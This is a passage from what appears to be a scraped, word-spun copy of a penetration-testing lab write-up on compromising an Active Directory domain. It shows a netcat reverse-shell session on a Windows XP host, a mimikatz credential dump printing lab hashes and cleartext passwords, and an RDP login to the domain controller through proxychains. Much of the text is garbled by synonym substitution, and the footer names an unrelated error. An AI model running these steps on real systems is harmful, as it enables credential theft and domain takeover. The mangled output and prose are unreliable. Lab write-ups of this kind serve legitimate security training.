root@Kali:~/PTP/5.3 XSS/Lab 27# nc -nlvp 4390 listening on [any] 4390 ... connect to [172.16.111.30] from (UNKNOWN) [172.xvi.111.1] 22421 Microsoft Windows XP [Version 5.one.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Lab27\incognito2>cd .. cd .. C:\Lab27>whoami.exe && ipconfig /all whoami.exe && ipconfig /all EXAMPLEAD\ExampleAdm Windows IP Configuration Host Name . . . . . . . . . . . . : PCClientXP Primary Dns Suffix . . . . . . . : examplead.lan Node Type . . . . . . . . . . . . : Unknown IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : examplead.lan Ethernet adapter Local Expanse Connectedness: Connectedness-specific DNS Suffix . : Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter Concrete Address. . . . . . . . . : 00-l-56-A1-DD-E3 Dhcp Enabled. . . . . . . . . . . : No IP Accost. . . . . . . . . . . . : 192.168.200.200 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.200.1 DNS Servers . . . . . . . . . . . : 192.168.200.100
Great. We are now exampleadm. At present if we simply want to dump the domain admin credentials with mimikatz we can practise this. Notation that we don't need to impersonate ourselves as exampleadm. SYSTEM is good enough since it is king.
Copy over and run mimikatz 32 chip (since this is x86 Win XP).
C:\Lab27\mimikatz>mimikatz.exe mimikatz.exe .#####. mimikatz 2.1.one (x86) #17763 December 9 2018 23:56:27 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition ** ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::kerberos Hallmark Id : 0 ; 56797 (00000000:0000dddd) Session : CachedInteractive from 0 User Proper noun : ExampleUser Domain : EXAMPLEAD Logon Server : DC01 Logon Time : 5/31/2019 2:44:12 PM SID : Southward-1-5-21-429699418-3694911538-2518303737-1104 kerberos : * Username : ExampleUser * Domain : EXAMPLEAD.LAN * Countersign : (naught) Authentication Id : 0 ; 997 (00000000:000003e5) Session : Service from 0 User Proper name : LOCAL SERVICE Domain : NT Potency Logon Server : (null) Logon Time : 5/31/2019 ii:44:11 PM SID : South-1-5-nineteen kerberos : * Username : (null) * Domain : (naught) * Password : (cipher) Authentication Id : 0 ; 996 (00000000:000003e4) Session : Service from 0 User Name : NETWORK SERVICE Domain : NT Say-so Logon Server : (null) Logon Time : 5/31/2019 ii:44:11 PM SID : Southward-1-5-20 kerberos : * Username : PCCLIENTXP$ * Domain : EXAMPLEAD * Password : 83 13 b4 db 20 48 aa 02 8d dd 46 17 27 93 61 f7 0e 91 1e 49 db 1d xxx 63 87 cd 52 f8 Authentication Id : 0 ; 48257 (00000000:0000bc81) Session : UndefinedLogonType from 0 User Name : (null) Domain : (zip) Logon Server : (null) Logon Time : 5/31/2019 two:44:11 PM SID : kerberos : Authentication Id : 0 ; 999 (00000000:000003e7) Session : UndefinedLogonType from 0 User Name : PCCLIENTXP$ Domain : EXAMPLEAD Logon Server : (nix) Logon Time : 5/31/2019 2:44:11 PM SID : South-ane-v-xviii kerberos : * Username : pcclientxp$ * Domain : EXAMPLEAD.LAN * Password : 83 13 b4 db 20 48 aa 02 8d dd 46 17 27 93 61 f7 0e 91 1e 49 db 1d 30 63 87 cd 52 f8 mimikatz # sekurlsa::logonpasswords Hallmark Id : 0 ; 563233 (00000000:00089821) Session : Interactive from 0 User Name : ExampleAdm Domain : EXAMPLEAD Logon Server : DC01 Logon Time : 6/ii/2019 four:33:16 AM SID : S-ane-five-21-429699418-3694911538-2518303737-1110 msv : [00000002] Primary * Username : exampleadm * Domain : EXAMPLEAD * LM : fb3b015aeac5023d32a9f7564c63ded3 * NTLM : 85aca8b4f962c10011235b54deb64d90 * SHA1 : 485b60c32af0b0cbd1b56a78306f2fc11cbd178e wdigest : * Username : exampleadm * Domain : EXAMPLEAD * Password : manageth3PC'z kerberos : * Username : ExampleAdm * Domain : EXAMPLEAD.LAN * Countersign : (nix) ssp : credman : Authentication Id : 0 ; 56797 (00000000:0000dddd) Session : CachedInteractive from 0 User Proper name : ExampleUser Domain : EXAMPLEAD Logon Server : DC01 Logon Fourth dimension : 5/31/2019 2:44:12 PM SID : S-1-v-21-429699418-3694911538-2518303737-1104 msv : [00000002] Principal * Username : ExampleUser * Domain : EXAMPLEAD * LM : 74ac99ca40ded420c2d133f323f692b3 * NTLM : 8e17bb16766eaf072b8d0780fd9f5403 * SHA1 : 3d6bb41508759a257b58703d7b702bed6a40156e wdigest : * Username : ExampleUser * Domain : EXAMPLEAD * Password : MyPassword! kerberos : * Username : ExampleUser * Domain : EXAMPLEAD.LAN * Password : (null) ssp : credman : Authentication Id : 0 ; 997 (00000000:000003e5) Session : Service from 0 User Name : LOCAL SERVICE Domain : NT AUTHORITY Logon Server : (zero) Logon Fourth dimension : 5/31/2019 two:44:11 PM SID : S-1-5-nineteen msv : wdigest : kerberos : * Username : (null) * Domain : (goose egg) * Password : (cipher) ssp : credman : Hallmark Id : 0 ; 996 (00000000:000003e4) Session : Service from 0 User Proper name : NETWORK SERVICE Domain : NT AUTHORITY Logon Server : (null) Logon Fourth dimension : 5/31/2019 2:44:11 PM SID : South-1-v-20 msv : [00000002] Principal * Username : PCCLIENTXP$ * Domain : EXAMPLEAD * NTLM : 1cddb4ffe3ce408edfac5bd56d807ac3 * SHA1 : eb92271baa82e4bedbb2adef40f1320a7d492b1b wdigest : * Username : (cipher) * Domain : (nothing) * Password : 83 thirteen b4 db 20 48 aa 02 8d dd 46 17 27 93 61 f7 0e 91 1e 49 db 1d thirty 63 87 cd 52 f8 kerberos : * Username : PCCLIENTXP$ * Domain : EXAMPLEAD * Password : 83 13 b4 db 20 48 aa 02 8d dd 46 17 27 93 61 f7 0e 91 1e 49 db 1d 30 63 87 cd 52 f8 ssp : credman : Authentication Id : 0 ; 48257 (00000000:0000bc81) Session : UndefinedLogonType from 0 User Name : (cipher) Domain : (null) Logon Server : (nothing) Logon Time : five/31/2019 2:44:11 PM SID : msv : [00000002] Primary * Username : PCCLIENTXP$ * Domain : EXAMPLEAD * NTLM : 1cddb4ffe3ce408edfac5bd56d807ac3 * SHA1 : eb92271baa82e4bedbb2adef40f1320a7d492b1b wdigest : kerberos : ssp : credman : Hallmark Id : 0 ; 999 (00000000:000003e7) Session : UndefinedLogonType from 0 User Name : PCCLIENTXP$ Domain : EXAMPLEAD Logon Server : (nil) Logon Time : 5/31/2019 2:44:11 PM SID : S-1-5-xviii msv : wdigest : * Username : PCCLIENTXP$ * Domain : EXAMPLEAD * Countersign : 83 13 b4 db twenty 48 aa 02 8d dd 46 17 27 93 61 f7 0e 91 1e 49 db 1d xxx 63 87 cd 52 f8 kerberos : * Username : pcclientxp$ * Domain : EXAMPLEAD.LAN * Countersign : 83 13 b4 db 20 48 aa 02 8d dd 46 17 27 93 61 f7 0e 91 1e 49 db 1d xxx 63 87 cd 52 f8 ssp : credman :
Skillful. Do note that exampleadm has to log in to exit their tokens in order for mimikatz to dump them. If this doesn't happen we don't accept a fashion to impersonate or dump them. We besides got exampleuser, a domain user creds for skillful mensurate.
Correct we are nearly done. Let's now test the domain admin login credentials by logging in via RDP to the DC. Remember the nmap scan in a higher place? Port 3389 was open and then RDP must be running.
root@Kali:~/PTP/v.3 XSS/Lab 27# proxychains xfreerdp /d:ExampleAD /u:ExampleADM /cert-ignore /v:192.168.200.100 ProxyChains-iii.1 (http://proxychains.sf.net) continued to 192.168.200.100:3389 Countersign:
And we are done. Unless of course we want to try escalate to Organisation for either PCCLIENT7 or the DC. I'll do the onetime in a new post.
Unsuccessful attempts
This section will be reserved for enumeration/attack vectors I tried higher up which didn't lead anywhere. WIP at the moment 🙂
Source: https://ivanitlearning.wordpress.com/2019/06/07/active-directory-exploitation-via-gpp-and-token-impersonation/
0 Response to "Beef Kernel_require.rb:59:in `require': Cannot Load Such File-- Hitimes/hitimes (Loaderror)"
Post a Comment